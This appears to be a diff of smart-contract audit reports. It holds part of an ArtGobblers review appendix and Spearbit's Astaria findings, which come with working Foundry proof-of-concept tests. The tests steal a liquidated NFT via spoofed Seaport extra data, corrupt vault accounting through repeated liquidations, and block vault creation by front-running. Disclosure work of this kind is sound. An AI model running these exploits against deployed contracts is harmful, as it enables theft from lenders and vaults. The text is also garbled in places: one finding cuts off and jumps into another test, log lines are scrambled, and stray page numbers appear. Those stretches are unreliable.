That is, there are cases where the optimal goo production happens when Goo is taken out of an account and sent to a different one. A special case of (2) happens when $G = 0$. This corresponds to the case where a group redistributes Goo to maximize the total Goo production. Equation (2), in this case, can be formulated as: $$s'_i + s_i = \frac{m_i}{\sum_{i=1}^{n} m_i} \sum_{i=1}^{n} s_i$$ That is, everyone's Goo amount is proportional to the multiple of their Gobbler. We emphasize again that this same optimum can be reached by pooling all Gobblers and Goo in a single account, without having to go through the redistribution. Also note that once the redistribution happens, it continues being optimal as time progresses, which also simplifies the game mechanics. 6.2 Fuzzing the functions wadLn and wadExp Solmate's functions lnWad and expWad were used in ArtGobblers. These functions were implemented by Remco. Since this was one of the earliest applications of these functions, we built two different fuzzers to compare the implementation against a multi-precision implementation of exponentiation and logarithm. A fast fuzzer written in Rust can be found in solmate-math-fuzz. It compares the results of random inputs for ln and exp against a multi-precision floating point library in Rust. A relative tolerance was chosen, as these are numerical approximations. An implementation that uses Foundry and ffi against Python was also written. 6.3 The Fisher-Yates shuffle The Gobblers' multipliers are revealed using an on-chain Fisher-Yates shuffle. We wanted to empirically verify how random these shuffles looked. We wrote some simple simulations for revealing all gobblers and visualized the shuffles in a Jupyter notebook, shuffles.ipynb. The multipliers 6, 7, 8 and 9 should occur with frequencies 3054, 2618, 2291 and 2027 respectively. These numbers were chosen so that the 'weighted multiplier' of each group is approximately the same, i.e., $6 \times 3054 \approx 7 \times 2618 \approx 8 \times 2291 \approx 9 \times 2027$. Here are two example plots of the distribution of multipliers: 6.4 Empirical analysis of fixed points in the shuffle It is interesting to look at the number of fixed points in the shuffle and compare it against the expected number of fixed points (i.e., indices that the shuffle keeps unchanged) in a random shuffle. It is known that for a set of $n$ elements, the fraction of derangements (i.e., shuffles that don't have any fixed points) converges to $1/e$ (reference). We found that the empirical data matched this value. Details can be found in shuffles.ipynb. Figure 1: A sample from the distribution of multipliers Figure 2: Another sample from the distribution of the multipliers Figure 3: 3D Plot of Page VRGDA Price development, zoomed in at the time of the switch 6.5 The switch in Pages's VRGDA The issuance of both Gobblers and Pages is based on VRGDAs; however, there's a limited number of Gobblers that can be minted, while the supply of Pages is infinite. Similarly to Gobblers, the issuance schedule is fast at the beginning and then intended to slow down. But for Pages, a switch happens at a certain point where issuance becomes linear. One of the concerns here was whether this switch would be smooth, and to determine this, various plots were generated from the contract's implementation of the VRGDA logic.
One can plot this in three-dimensional space: the time that has passed, the amount of Pages minted so far, and the price resulting from these two parameters. Zoomed in at the point of the switch, there appeared to be a slight dent. To further investigate this, a two-dimensional chart was plotted with the price fixed at 4.20, which is the target starting price of each Page's auction. The plot shows how much time has to pass between each sale to reach the intended starting price again. Here the issue became clearly visible: there's a sudden drop of time during the switch to linear issuance. The smoothness problem was acknowledged and fixed by changing the Pages VRGDA parameters. 6.6 Note on solutions of the differential equation The rate of GOO issuance, $g(t) : [0, \infty) \to [0, \infty)$, is defined by the boundary value problem $$g'(t) = \sqrt{g(t) \cdot m}$$ where $g(0) = c$ for some constant $c$, the initial value of GOO. Figure 4: 2D Plot of time passed until Page price reaches the target again, zoomed in at the time of the switch One of the solutions of the differential equation is $$g(t) = \tfrac{1}{4}\left(\sqrt{m}\, t + 2\sqrt{c}\right)^2$$ However, for $c = 0$ the above solution is not unique, as $g(t) = 0$ is also a solution. One can notice that the function $y \mapsto \sqrt{m \cdot y}$ is not Lipschitz continuous at $y = 0$. To see this, assume that there exists a $K > 0$ such that for all distinct $y_0, y_1 \in \mathbb{R}$ (without loss of generality, let's assume that they are also non-negative): $$\sqrt{m}\,\left|\sqrt{y_0} - \sqrt{y_1}\right| \le K \left|y_0 - y_1\right| \implies \frac{\sqrt{m}}{\sqrt{y_0} + \sqrt{y_1}} \le K \quad (3)$$ However, for any two distinct reals $y_0, y_1$ satisfying $\sqrt{y_0} + \sqrt{y_1} < \sqrt{m}/K$, the inequality (3) is false. If the range of $g$ is in $(\varepsilon, \infty)$ for some $\varepsilon > 0$, it is straightforward to see that $\sqrt{m \cdot g}$ is Lipschitz continuous, which means that there is a unique solution of the differential equation in such cases due to the Picard–Lindelöf theorem. 6.7 About legendary gobbler mints without revealing gobblers Apart from the issues mentioned in findings, Spearbit left a comment in the shared GitHub repo that mintLegendaryGobbler allows using un-revealed gobblers to mint legendary gobblers, and uses the multiplier value of 0 for such cases. This may not be ideal in some cases. The art-gobblers team commented that (paraphrasing): This is great thinking but I think we're probably ok with the current functionality. Like if there's an arms race for legendary gobblers we might not want ppl to have to wait until 4:20 to have their gobblers revealed before they can use them to snatch up the legendary. But, I'll check with others in team just to be sure. Yeah, the team is also on the side of keeping as is. 6.8 Changing the Gobbler NFT from ERC-1155 to ERC-721 After the Spearbit review, the Gobbler NFT was changed from ERC-1155 to ERC-721 (see PR #144). This introduced a very subtle bug: approvals in the ERC-1155 standard (isApprovedForAll) index on the owner of the NFT, whereas approvals in ERC-721 index on the NFT id. This means that a destructive action on the NFT, such as burning gobblers to mint a legendary, needs to remove this approval. However, this was missed in the refactor, which allows these approved and burned tokens to be resurrected, breaking the protocol. This bug wasn't present in the original ERC-1155 implementation due to this subtle difference in how approvals are made.
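In ERC-721 terms, the missing step looks roughly like the following sketch (solmate-style storage names assumed; this illustrates the idea rather than reproducing the actual ArtGobblers code):

pragma solidity ^0.8.0;

// Sketch of an ERC-721 burn that also clears the per-token approval, the
// step that was missed in the refactor.
abstract contract ERC721BurnSketch {
    mapping(uint256 => address) internal _ownerOf;
    mapping(uint256 => address) public getApproved;
    mapping(address => uint256) internal _balanceOf;

    function _burn(uint256 id) internal virtual {
        address owner = _ownerOf[id];
        require(owner != address(0), "NOT_MINTED");
        unchecked {
            _balanceOf[owner]--;
        }
        delete _ownerOf[id];
        // Without this line a stale approval survives the burn and can be
        // used to "resurrect" the token, which is what broke the protocol.
        delete getApproved[id];
    }
}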
diff --git a/findings_newupdate/spearbit/Astaria-Spearbit-Security-Review-July.txt b/findings_newupdate/spearbit/Astaria-Spearbit-Security-Review-July.txt new file mode 100644 index 0000000..50fed53 --- /dev/null +++ b/findings_newupdate/spearbit/Astaria-Spearbit-Security-Review-July.txt @@ -0,0 +1,77 @@
+5.1.1 The extra data (encoded stack) provided to advanced orders on Seaport is not validated properly by the CollateralToken upon callback Severity: Critical Risk Context: • CollateralToken.sol#L125 • CollateralToken.sol#L145-L148 • CollateralToken.sol#L150-L152 • CollateralToken.sol#L175 Description: The extra data (encoded stack) provided to advanced orders on Seaport is not validated properly by the CollateralToken upon callback when validateOrder(...) is called by Seaport. When a stack/lien gets liquidated, an auction is created on Seaport with the offerer and zone set to the CollateralToken, and the order type is full-restricted, so that the aforementioned callback is performed at the end of fulfilling/matching orders on Seaport. An extra piece of information which needs to be provided by the fulfiller or matcher on Seaport is the extra data, which is the encoded stack. The only validation that happens during the callback is the following, to make sure that the 1st consideration's token matches the decoded stack's lien token: ERC20 paymentToken = ERC20(zoneParameters.consideration[0].token); if (address(paymentToken) != stack.lien.token) { revert InvalidPaymentToken(); } Besides that, there is no check that this stack corresponds to the same collateralId with the same lien id. So a bidder on Seaport can take advantage of this and provide spoofed extra data as follows: 1. The borrower collateralises its NFT token and takes a lien from a public vault. 2. The lien expires and a liquidator calls liquidate(...) for the corresponding stack. 3. The bidder creates a private vault and deposits 1 wei worth of WETH into it. 4. The bidder collateralises a fake NFT token and takes a lien with 1 wei worth of WETH as a loan. 5. The bidder provides the encoded fake stack from step 4 as extra data to settle the auction for the real liquidated lien from step 2 on Seaport. The net result of these steps is that: • The original NFT token will be owned by the bidder. • The change in the sum of the ETH and WETH balances of the borrower, liquidator and the bidder would be the original borrowed amount from step 1 (might be off by a few wei due to division errors when calculating the liquidator fees). • The original public vault would not receive its loan amount from the borrower or the auction amount from the Seaport liquidation auction. If the borrower, the liquidator and the bidder were the same, this entity would end up with its original NFT token plus the loaned amount from the original public vault. If the liquidator and the bidder were the same, the bidder would end up with the original NFT token and might have to pay around 1 wei due to division errors. The borrower gets to keep its loan. The public vault would not receive the loan or any portion of the amount settled in the liquidation auction.
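To make the missing validation concrete before the PoC below, here is a minimal self-contained sketch of the checks that the Recommendation at the end of this finding describes (struct shapes reduced to the fields the check needs; the error name is hypothetical):

pragma solidity ^0.8.0;

contract ValidateOrderSketch {
    struct Lien { address token; uint256 collateralId; }
    struct Stack { Lien lien; }

    error InvalidOrder(); // hypothetical error name

    // `stack` is decoded from zoneParameters.extraData, `collateralId`
    // identifies the collateral actually being auctioned, and
    // `storedState` stands in for LIEN_TOKEN.getCollateralState(collateralId).
    function _checkStack(Stack memory stack, uint256 collateralId, bytes32 storedState) internal pure {
        // 1. the decoded stack must refer to the auctioned collateral.
        if (stack.lien.collateralId != collateralId) revert InvalidOrder();
        // 2. optionally pin the entire stack to the stored collateral state.
        if (storedState != keccak256(abi.encode(stack))) revert InvalidOrder();
    }
}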
The following diff in the test contracts is needed for the PoC to work: diff --git a/src/test/TestHelpers.t.sol b/src/test/TestHelpers.t.sol index fab5fbd..5c9bfc8 100644 --- a/src/test/TestHelpers.t.sol +++ b/src/test/TestHelpers.t.sol @@ -163,7 +163,6 @@ contract ConsiderationTester is BaseSeaportTest, AmountDeriver { vm.label(address(this), "testContract"); } } - contract TestHelpers is Deploy, ConsiderationTester { using CollateralLookup for address; using Strings2 for bytes; @@ -1608,7 +1607,7 @@ contract TestHelpers is Deploy, ConsiderationTester { orders, new CriteriaResolver[](0), fulfillments, - address(this) + incomingBidder.bidder ); } else { consideration.fulfillAdvancedOrder( @@ -1621,7 +1620,7 @@ contract TestHelpers is Deploy, ConsiderationTester { ), new CriteriaResolver[](0), bidderConduits[incomingBidder.bidder].conduitKey, - address(this) + incomingBidder.bidder ); } delete fulfillments; The PoC: forge t --mt testScenario9 --ffi -vvv // add the following test case to // file: src/test/LienTokenSettlementScenarioTest.t.sol // Scenario 9: commitToLien -> liquidate -> settle Seaport auction with mismatching stack as extraData function testScenario9() public { TestNFT nft = new TestNFT(1); address tokenContract = address(nft); uint256 tokenId = uint256(0); vm.label(address(this), "borrowerContract"); { // create a PublicVault with a 14-day epoch address publicVault = _createPublicVault( strategistOne, strategistTwo, 14 days, 1e17 ); vm.label(publicVault, "Public Vault"); // lend 10 ether to the PublicVault as address(1) _lendToVault( Lender({addr: address(1), amountToLend: 10 ether}), payable(publicVault) ); emit log_named_uint("Public vault WETH balance before committing to a lien", WETH9.balanceOf(publicVault)); emit log_named_uint("borrower ETH balance before committing to a lien", address(this).balance); emit log_named_uint("borrower WETH balance before committing to a lien", WETH9.balanceOf(address(this))); // borrow 10 eth against the dummy NFT with tokenId 0 (, ILienToken.Stack memory stack) = _commitToLien({ vault: payable(publicVault), strategist: strategistOne, strategistPK: strategistOnePK, tokenContract: tokenContract, tokenId: tokenId, lienDetails: ILienToken.Details({ maxAmount: 50 ether, rate: (uint256(1e16) * 150) / (365 days), duration: 10 days, maxPotentialDebt: 0 ether, liquidationInitialAsk: 100 ether }), amount: 10 ether }); assertEq( nft.ownerOf(tokenId), address(COLLATERAL_TOKEN), "The bidder did not receive the collateral token after the auction end." ); emit log_named_uint("Public vault WETH balance after committing to a lien", WETH9.balanceOf(publicVault)); emit log_named_address("NFT token owner", nft.ownerOf(tokenId)); emit log_named_uint("borrower ETH balance after committing to a lien", address(this).balance); emit log_named_uint("borrower WETH balance after committing to a lien", WETH9.balanceOf(address(this)));
uint256 collateralId = tokenContract.computeId(tokenId); // verify the strategist has no shares minted assertEq( PublicVault(payable(publicVault)).balanceOf(strategistOne), 0, "Strategist has incorrect share balance" ); // verify that the borrower has the CollateralTokens assertEq( COLLATERAL_TOKEN.ownerOf(collateralId), address(this), "CollateralToken not minted to borrower" ); // fast forward to the end of the lien one vm.warp(block.timestamp + 10 days); address liquidatorOne = vm.addr(0x1195da7051); vm.label(liquidatorOne, "liquidator 1"); // liquidate the lien vm.startPrank(liquidatorOne); emit log_named_uint("liquidator WETH balance before liquidation", WETH9.balanceOf(liquidatorOne)); OrderParameters memory listedOrder = _liquidate(stack); vm.stopPrank(); assertEq( LIEN_TOKEN.getAuctionLiquidator(collateralId), liquidatorOne, "liquidator is not stored in s.collateralLiquidator[collateralId]" ); // --- start of the attack --- vm.label(bidder, "bidder"); vm.startPrank(bidder); TestNFT fakeNFT = new TestNFT(1); address fakeTokenContract = address(fakeNFT); uint256 fakeTokenId = uint256(0); vm.stopPrank(); address privateVault = _createPrivateVault( bidder, bidder ); vm.label(privateVault, "Fake Private Vault"); _lendToPrivateVault( PrivateLender({ addr: bidder, amountToLend: 1 wei, token: address(WETH9) }), payable(privateVault) ); vm.startPrank(bidder); // it is important that the fakeStack.lien.token is the same as the original stack's token // below deals 1 wei to the bidder which is also the fakeStack borrower (, ILienToken.Stack memory fakeStack) = _commitToLien({ vault: payable(privateVault), strategist: bidder, strategistPK: bidderPK, tokenContract: fakeTokenContract, tokenId: fakeTokenId, lienDetails: ILienToken.Details({ maxAmount: 1 wei, rate: 1, // needs to be non-zero duration: 1 hours, // s.minLoanDuration maxPotentialDebt: 0 ether, liquidationInitialAsk: 1 wei }), amount: 1 wei }); emit log_named_uint("CollateralToken WETH balance before auction end", WETH9.balanceOf(address(COLLATERAL_TOKEN))); // _bid deals 300 ether to the bidder _bid( Bidder({bidder: bidder, bidderPK: bidderPK}), listedOrder, // order parameters created for the original stack during the liquidation 100 ether, // stack.lien.details.liquidationInitialAsk fakeStack ); emit log_named_uint("Public vault WETH balance after auction end", WETH9.balanceOf(publicVault)); emit log_named_uint("borrower WETH balance after auction end", WETH9.balanceOf(address(this))); emit log_named_uint("liquidator WETH balance after auction end", WETH9.balanceOf(liquidatorOne)); emit log_named_uint("bidder WETH balance after auction end", WETH9.balanceOf(bidder)); emit log_named_uint("bidder ETH balance before committing to a lien", address(bidder).balance); emit log_named_uint("CollateralToken WETH balance after auction end", WETH9.balanceOf(address(COLLATERAL_TOKEN))); emit log_named_address("bidder", bidder); emit log_named_address("owner of the original collateral after auction end", nft.ownerOf(tokenId)); // _removeLien is not called for collateralId assertEq( LIEN_TOKEN.getAuctionLiquidator(collateralId), liquidatorOne, "_removeLien is called for collateralId" ); // WETH balance of the public vault is still 0 even after the auction assertEq( WETH9.balanceOf(publicVault), 0 ); } assertEq( nft.ownerOf(tokenId), bidder, "The bidder did not receive the collateral token after the auction end." ); } Recommendation: In validateOrder(...), in the 1st if branch when zoneParameters.offerer == address(this), make sure that 1. stack.lien.collateralId == collateralId and 2. LIEN_TOKEN.getCollateralState(collateralId) == keccak256(abi.encode(stack)). It might also be good to check that keccak256(abi.encode(stack)) == keccak256(zoneParameters.extraData), but this requirement will be checked in makePayment(...) if 1. is satisfied. Astaria: Fixed in PR 334 by checking stack.lien.collateralId == collateralId. Spearbit: Fixed.
+5.1.2 AstariaRouter.liquidate(...) can be called multiple times for an expired lien/stack Severity: Critical Risk Context: • AstariaRouter.sol#L681 • CollateralToken.sol#L530-L532 • LienToken.sol#L171-L174 • PublicVault.sol#L656-L661 • PublicVault.sol#L655 Description: The current implementation of the protocol does not have any safeguard around calling AstariaRouter.liquidate(...) only once for an expired stack/lien. Thus, when a lien expires, multiple adversaries can override many different parameters by calling this endpoint at will, in the same block or in different blocks, until one of the created auctions settles (which might never happen, as one can keep stacking these auctions with some delays to create a never-ending liquidation flow). Here is the list of storage parameters that can be manipulated: • s.collateralLiquidator[stack.lien.collateralId].amountOwed in LienToken: it is possible to keep increasing this value if we stack calls to liquidate(...) with delays. • s.collateralLiquidator[stack.lien.collateralId].liquidator in LienToken: this can be overwritten and would hold the last liquidator's address, so only this liquidator can claim the NFT if the corresponding auction does not settle, and it would also receive the liquidation fees. • s.idToUnderlying[params.collateralId].auctionHash in CollateralToken: would hold the last created auction's order hash for the same expired lien backed by the same collateral. • slope in PublicVault: if the lien is taken from a public vault, each call to liquidate(...) would reduce this value, so we can make the slope really small. • s.epochData[epoch].liensOpenForEpoch in PublicVault: if the lien is taken from a public vault, each call to liquidate(...) would reduce this value, potentially to 0 or into an arithmetic underflow, depending on the rate of the lien and the slope of the vault. • yIntercept in PublicVault: mixing the manipulation of the vault's slope with stacked, delayed calls to liquidate(...), we can also manipulate yIntercept. // add the following test case to: // file: src/test/LienTokenSettlementScenarioTest.t.sol function testScenario8() public { TestNFT nft = new TestNFT(2); address tokenContract = address(nft); uint256 tokenIdOne = uint256(0); uint256 tokenIdTwo = uint256(1); uint256 initialBalance = WETH9.balanceOf(address(this)); // create a PublicVault with a 14-day epoch address publicVault = _createPublicVault( strategistOne, strategistTwo, 14 days, 1e17 ); // lend 20 ether to the PublicVault as address(1) _lendToVault( Lender({addr: address(1), amountToLend: 20 ether}), payable(publicVault) ); uint256 vaultShares = PublicVault(payable(publicVault)).totalSupply(); // borrow 10 eth against the dummy NFT with tokenId 0 (, ILienToken.Stack memory stackOne) = _commitToLien({ vault: payable(publicVault), strategist: strategistOne, strategistPK: strategistOnePK, tokenContract: tokenContract, tokenId: tokenIdOne, lienDetails: ILienToken.Details({ maxAmount: 50 ether, rate: (uint256(1e16) * 150) / (365 days), duration: 10 days, maxPotentialDebt: 0 ether, liquidationInitialAsk: 100 ether }), amount: 10 ether }); // borrow 10 eth against the dummy NFT with tokenId 1 (, ILienToken.Stack memory stackTwo) = _commitToLien({ vault: payable(publicVault), strategist: strategistOne, strategistPK: strategistOnePK, tokenContract: tokenContract, tokenId: tokenIdTwo, lienDetails: ILienToken.Details({ maxAmount: 50 ether, rate: (uint256(1e16) * 150) / (365 days), duration: 10 days, maxPotentialDebt: 0 ether, liquidationInitialAsk: 100 ether }), amount: 10 ether }); uint256 collateralIdOne = tokenContract.computeId(tokenIdOne); uint256 collateralIdTwo = tokenContract.computeId(tokenIdTwo); // verify the strategist has no shares minted assertEq( PublicVault(payable(publicVault)).balanceOf(strategistOne), 0, "Strategist has incorrect share balance" ); // verify that the borrower has the CollateralTokens assertEq( COLLATERAL_TOKEN.ownerOf(collateralIdOne), address(this), "CollateralToken not minted to borrower" ); assertEq( COLLATERAL_TOKEN.ownerOf(collateralIdTwo), address(this), "CollateralToken not minted to borrower" ); // fast forward to the end of the lien one vm.warp(block.timestamp + 10 days); address liquidatorOne = vm.addr(0x1195da7051); address liquidatorTwo = vm.addr(0x1195da7052); vm.label(liquidatorOne, "liquidator 1"); vm.label(liquidatorTwo, "liquidator 2"); // liquidate the first lien vm.startPrank(liquidatorOne); OrderParameters memory listedOrder = _liquidate(stackOne); vm.stopPrank(); assertEq( LIEN_TOKEN.getAuctionLiquidator(collateralIdOne), liquidatorOne, "liquidator is not stored in s.collateralLiquidator[collateralId]" ); // liquidate the first lien with a different liquidator vm.startPrank(liquidatorTwo); listedOrder = _liquidate(stackOne); vm.stopPrank(); assertEq( LIEN_TOKEN.getAuctionLiquidator(collateralIdOne), liquidatorTwo, "liquidator is not stored in s.collateralLiquidator[collateralId]" ); // validate the slope is updated twice for the same expired lien // and so the accounting for the public vault is manipulated assertEq( PublicVault(payable(publicVault)).getSlope(), 0, "PublicVault slope divergent" ); // publicVault.storageSlot.epochData[epoch].liensOpenForEpoch is also decremented twice // CollateralToken.storageSlot.idToUnderlying[params.collateralId].auctionHash can also be manipulated } Recommendation: When AstariaRouter.liquidate(...) is called, make sure the expired lien/stack does not have any active liquidation auction before performing any actions.
For example, one can check the values of: • s.collateralLiquidator[stack.lien.collateralId].liquidator or • s.idToUnderlying[params.collateralId].auctionHash Astaria: Fixed in PR 333 by checking s.collateralLiquidator[stack.lien.collateralId].liquidator. Spearbit: Fixed. 5.2 High Risk
+5.2.1 maxStrategistFee is incorrectly set in AstariaRouter's constructor Severity: High Risk Context: • AstariaRouter.sol#L111 • AstariaRouter.sol#L325-L329 • PublicVault.sol#L637-L641 Description: In AstariaRouter's constructor we set maxStrategistFee as s.maxStrategistFee = uint256(50e17); // 5e18 But in the filing route we check that this value should not be greater than 1e18.
); // borrow 1 wei against the dummy NFT (lienId, ) = _commitToLien({ vault: payable(privateVault), strategist: owner, strategistPK: ownerPK, tokenContract: tokenContract, tokenId: tokenId, lienDetails: ILienToken.Details({ maxAmount: 1 wei, rate: 1, duration: 1 hours, maxPotentialDebt: 0 ether, liquidationInitialAsk: 1 ether }), amount: 1 wei, revertMessage: "" }); console2.log("[+] borrowed 1 wei against the private vault."); lienId: %s", lienId); console2.log(" owner of lienId: %s\n\n", LIEN_TOKEN.ownerOf(lienId)); console2.log(" assertEq( LIEN_TOKEN.ownerOf(lienId), owner, "owner should be the owner of the lienId." ); } { console2.log("--- test public vault shutdown ---"); uint256 ownerPK = uint256(0xa77ac322); address owner = vm.addr(ownerPK); vm.label(owner, "owner"); uint256 lienId; TestNFT nft = new TestNFT(1); address tokenContract = address(nft); uint256 tokenId = uint256(0); address publicVault = _createPublicVault(owner, owner, 14 days); vm.label(publicVault, "publicVault"); console2.log("[+] public vault is created: %s", publicVault); // lend 1 wei to the publicVault _lendToVault( Lender({addr: owner, amountToLend: 1 ether}), payable(publicVault) ); 15 console2.log("[+] lent 1 ether to the public vault."); console2.log("[+] shudown public vault."); vm.startPrank(owner); Vault(payable(publicVault)).shutdown(); vm.stopPrank(); assertEq( Vault(payable(publicVault)).getShutdown(), true, "Public Vault should be shutdown." ); // borrow 1 wei against the dummy NFT (lienId, ) = _commitToLien({ vault: payable(publicVault), strategist: owner, strategistPK: ownerPK, tokenContract: tokenContract, tokenId: tokenId, lienDetails: ILienToken.Details({ maxAmount: 1 wei, rate: 1, duration: 1 hours, maxPotentialDebt: 0 ether, liquidationInitialAsk: 1 ether }), amount: 1 wei, revertMessage: "" }); console2.log("[+] borrowed 1 wei against the public vault."); console2.log(" console2.log(" lienId: %s", lienId); owner of lienId: %s", LIEN_TOKEN.ownerOf(lienId)); assertEq( LIEN_TOKEN.ownerOf(lienId), publicVault, "Public vault should be the owner of the lienId." ); } } forge t --mt testScenario12 --ffi -vvv: 16 --- test private vault shutdown --- [+] private vault is created: 0x7BF14E2ad40df80677D356099565a08011B72d66 [+] lent 1 wei to the private vault. [+] shudown private vault. [+] borrowed 1 wei against the private vault. lienId: 78113226609386929237635937490344951966356214732432064308195118046023211325984 owner of lienId: 0x60873Bc6F2C9333b465F60e461cf548EfFc7E6EA --- test public vault shutdown --- [+] public vault is created: 0x5b1A54d097AA8Ce673b6816577752F6dfc10Ddd6 [+] lent 1 ether to the public vault. [+] shudown public vault. [+] borrowed 1 wei against the public vault. lienId: 13217102800774263219074199159187108198090219420208960450275388834853683629020 owner of lienId: 0x5b1A54d097AA8Ce673b6816577752F6dfc10Ddd6 Recommendation: In _executeCommitment(...) use the isShutdown flag to revert committing to a vault that has been shutdown. Astaria: Fixed in PR 335. Spearbit: Fixed. 
+5.2.3 Vault creation can be DoSed by lien owners who can transfer their lien token to any address Severity: High Risk Context: • AstariaRouter.sol#L778-L792 • AstariaRouter.sol#L794-L796 • Vault.sol#L53-L58 Description: When a vault is created, AstariaRouter uses the Create2ClonesWithImmutableArgs library to create a clone with immutable arguments: vaultAddr = Create2ClonesWithImmutableArgs.clone( s.BEACON_PROXY_IMPLEMENTATION, abi.encodePacked( address(this), vaultType, msg.sender, params.underlying, block.timestamp, params.epochLength, params.vaultFee, address(s.WETH) ), keccak256(abi.encodePacked(msg.sender, blockhash(block.number - 1))) ); One caveat of this design decision is that the to-be-deployed vault address can be derived beforehand. Right after the creation of the vault, AstariaRouter checks whether the created vault owns any liens and, if it does, it reverts: if (s.LIEN_TOKEN.balanceOf(vaultAddr) > 0) { revert InvalidVaultState(IAstariaRouter.VaultState.CORRUPTED); } When a lien is committed to from a private vault, the private vault, upon receiving the lien, transfers the minted lien token to the owner of the private vault: ERC721(msg.sender).safeTransferFrom( address(this), owner(), tokenId, data ); Combining all these facts, a private vault's owner, or any lien owner who can transfer their lien token to any address, can DoS the vault creation process using the steps below: 1. Create a private vault (if already owning a lien, jump to step 4). 2. Deposit 1 wei into the private vault. 3. Commit to a lien of 1 wei from the private vault. 4. The owner of the private vault front-runs the vault creation, computes the to-be-deployed vault address and transfers its lien token to this address. 5. The vault creation process fails with InvalidVaultState(IAstariaRouter.VaultState.CORRUPTED). The cost of this attack would be 1 wei plus the associated gas fees. // add the following test case to // file: src/test/LienTokenSettlementScenarioTest.t.sol // Scenario 11: commitToLien -> send lien to a to-be-deployed vault function testScenario11() public { uint256 attackerPK = uint256(0xa77ac3); address attacker = vm.addr(attackerPK); vm.label(attacker, "attacker"); uint256 lienId; { TestNFT nft = new TestNFT(1); address tokenContract = address(nft); uint256 tokenId = uint256(0); address privateVault = _createPrivateVault(attacker, attacker); vm.label(privateVault, "privateVault"); console2.log("[+] private vault is created: %s", privateVault); // lend 1 wei to the privateVault _lendToPrivateVault( PrivateLender({addr: attacker, amountToLend: 1 wei, token: address(WETH9)}), payable(privateVault) ); console2.log("[+] lent 1 wei to the private vault."); // borrow 1 wei against the dummy NFT (lienId, ) = _commitToLien({ vault: payable(privateVault), strategist: attacker, strategistPK: attackerPK, tokenContract: tokenContract, tokenId: tokenId, lienDetails: ILienToken.Details({ maxAmount: 1 wei, rate: 1, duration: 1 hours, maxPotentialDebt: 0 ether, liquidationInitialAsk: 1 ether }), amount: 1 wei, revertMessage: "" }); console2.log("[+] borrowed 1 wei against the private vault."); console2.log(" lienId: %s", lienId); console2.log(" owner of lienId: %s", LIEN_TOKEN.ownerOf(lienId)); assertEq( LIEN_TOKEN.ownerOf(lienId), attacker, "attacker should be the owner of the lienId."
); } address strategist = address(1); uint256 epochLength = 14 days; uint256 vaultFee = 1e17; { console2.log("[+] calculate the to-be-deployed public vault address."); bytes memory immutableData = abi.encodePacked( address(ASTARIA_ROUTER), uint8(1), // uint8(ImplementationType.PublicVault) strategist, address(WETH9), block.timestamp, epochLength, vaultFee, address(WETH9) ); bytes32 salt = keccak256(abi.encodePacked(strategist, blockhash(block.number - 1))); address toBeDeployedPublicvault = Create2ClonesWithImmutableArgs.deriveAddress( address(ASTARIA_ROUTER), ASTARIA_ROUTER.BEACON_PROXY_IMPLEMENTATION(), immutableData, salt ); console2.log(" toBeDeployedPublicvault address: %s", toBeDeployedPublicvault); vm.startPrank(attacker); LIEN_TOKEN.transferFrom(attacker, toBeDeployedPublicvault, lienId); vm.stopPrank(); console2.log("[+] lien transferred to the toBeDeployedPublicvault."); assertEq( LIEN_TOKEN.ownerOf(lienId), toBeDeployedPublicvault, "The owner of the lienId should be the toBeDeployedPublicvault." ); assertEq( LIEN_TOKEN.balanceOf(toBeDeployedPublicvault), 1, "The lien balance of toBeDeployedPublicvault should be 1." ); } // create a PublicVault vm.startPrank(strategist); vm.expectRevert( abi.encodeWithSelector( IAstariaRouter.InvalidVaultState.selector, IAstariaRouter.VaultState.CORRUPTED ) ); address publicVault = payable( ASTARIA_ROUTER.newPublicVault( epochLength, // epoch length in [7, 45] days strategist, address(WETH9), vaultFee, // not greater than 5e17 false, new address[](0), uint256(0) ) ); vm.stopPrank(); console2.log("[+] Public vault creation fails with InvalidVaultState(VaultState.CORRUPTED)."); } forge t --mt testScenario11 --ffi -vvv: Logs: [+] private vault is created: 0x7BF14E2ad40df80677D356099565a08011B72d66 [+] lent 1 wei to the private vault. [+] borrowed 1 wei against the private vault. lienId: 78113226609386929237635937490344951966356214732432064308195118046023211325984 owner of lienId: 0x60873Bc6F2C9333b465F60e461cf548EfFc7E6EA [+] calculate the to-be-deployed public vault address. toBeDeployedPublicvault address: 0xe9B9495b2A6b71A871b981A5Effa56575f872A31 [+] lien transferred to the toBeDeployedPublicvault. [+] Public vault creation fails with InvalidVaultState(VaultState.CORRUPTED). This issue was introduced in commit 04c6ea.
diff --git a/src/AstariaRouter.sol b/src/AstariaRouter.sol index cfa76f1..bd18a84 100644 --- a/src/AstariaRouter.sol +++ b/src/AstariaRouter.sol @@ -20,10 +20,9 @@ import {SafeTransferLib} from "solmate/utils/SafeTransferLib.sol"; import {ERC721} from "solmate/tokens/ERC721.sol"; import {ITransferProxy} from "core/interfaces/ITransferProxy.sol"; import {SafeCastLib} from "gpl/utils/SafeCastLib.sol"; -import { ClonesWithImmutableArgs -} from "clones-with-immutable-args/ClonesWithImmutableArgs.sol"; +import { Create2ClonesWithImmutableArgs +} from "create2-clones-with-immutable-args/Create2ClonesWithImmutableArgs.sol"; import {CollateralLookup} from "core/libraries/CollateralLookup.sol"; @@ -721,7 +720,7 @@ contract AstariaRouter is } //immutable data -vaultAddr = ClonesWithImmutableArgs.clone( +vaultAddr = Create2ClonesWithImmutableArgs.clone( s.BEACON_PROXY_IMPLEMENTATION, abi.encodePacked( address(this), @@ -731,9 +730,13 @@ contract AstariaRouter is block.timestamp, epochLength, vaultFee -) +), +keccak256(abi.encode(msg.sender, blockhash(block.number - 1))) ); +if (s.LIEN_TOKEN.balanceOf(vaultAddr) > 0) { +revert InvalidVaultState(IAstariaRouter.VaultState.CORRUPTED); +} //mutable data IVaultImplementation(vaultAddr).init( IVaultImplementation.InitParams({ This change was made to address two of the findings from the Code4rena audit: • code-423n4/2023-01-astaria-findings/issues/246. • code-423n4/2023-01-astaria-findings/issues/571.
